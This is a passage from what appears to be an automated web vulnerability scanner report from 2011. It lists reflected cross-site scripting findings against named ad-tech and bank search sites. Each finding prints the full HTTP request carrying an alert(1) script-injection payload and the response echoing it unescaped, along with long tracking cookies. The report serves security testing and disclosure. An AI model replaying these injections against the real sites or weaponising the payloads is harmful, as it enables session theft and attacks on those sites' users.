Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 4388
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:29 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:28 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Customers.GetCustomerResponse","payload":"{\"objectType\":\"Custo
...[SNIP]...
11a033338c2&t=' + trEscae8b1b2cb1(document.title) + '&r=' + trEscae8b1b2cb1(document.referrer);\r\n})();\r\n//]]>\r\n","ContentTrackingSrc":"","diagnostics":null,"requestedBy":""},'request_4423813743186b2fe<script>alert(1)</script>7d41626bf96');

1.429. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6506f"><script>alert(1)</script>91c27bc8e67 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=6506f"><script>alert(1)</script>91c27bc8e67&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:02:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=8310709099384096523&fpid=6506f"><script>alert(1)</script>91c27bc8e67&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.430. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38030"><script>alert(1)</script>3e8a29e1991 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=38030"><script>alert(1)</script>3e8a29e1991&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:02:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2664611420216086048&fpid=4&nu=n&t=&sp=38030"><script>alert(1)</script>3e8a29e1991&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.431. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wachovia.com
Path:   /selfservice/microsites/wachoviaSearchEntry.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef9"><script>alert(1)</script>6d3f3e1bc4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selfservice/microsites/wachoviaSearchEntry.do?aaef9"><script>alert(1)</script>6d3f3e1bc4b=1 HTTP/1.1
Host: search.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E2F343A11D72B8481BC40D2D653F4B5; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Thu, 03 Feb 2011 13:17:41 GMT
Connection: close


<html>
   
   <head>
       <title>KNOVA
   Search Results
</title>
       <meta http-equiv="content-type" content="text/html;c
...[SNIP]...
<TextArea name="aaef9"><script>alert(1)</script>6d3f3e1bc4b" style="display:none;visibility:hide">
...[SNIP]...

1.432. http://smm.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85494'%3balert(1)//dbe71432c4e was submitted in the h parameter. This input was echoed as 85494';alert(1)//dbe71432c4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=21818F4&w=300&h=25085494'%3balert(1)//dbe71432c4e&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:48 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="25085494';alert(1)//dbe71432c4e" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

1.433. http://smm.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed62"%3balert(1)//eec28b3a643 was submitted in the pid parameter. This input was echoed as aed62";alert(1)//eec28b3a643 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=21818F4aed62"%3balert(1)//eec28b3a643&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:46 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4aed62";alert(1)//eec28b3a643&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C1220000175%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D134%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woB
...[SNIP]...

1.434. http://smm.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79fda'%3balert(1)//cbed4520d8d was submitted in the w parameter. This input was echoed as 79fda';alert(1)//cbed4520d8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=21818F4&w=30079fda'%3balert(1)//cbed4520d8d&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
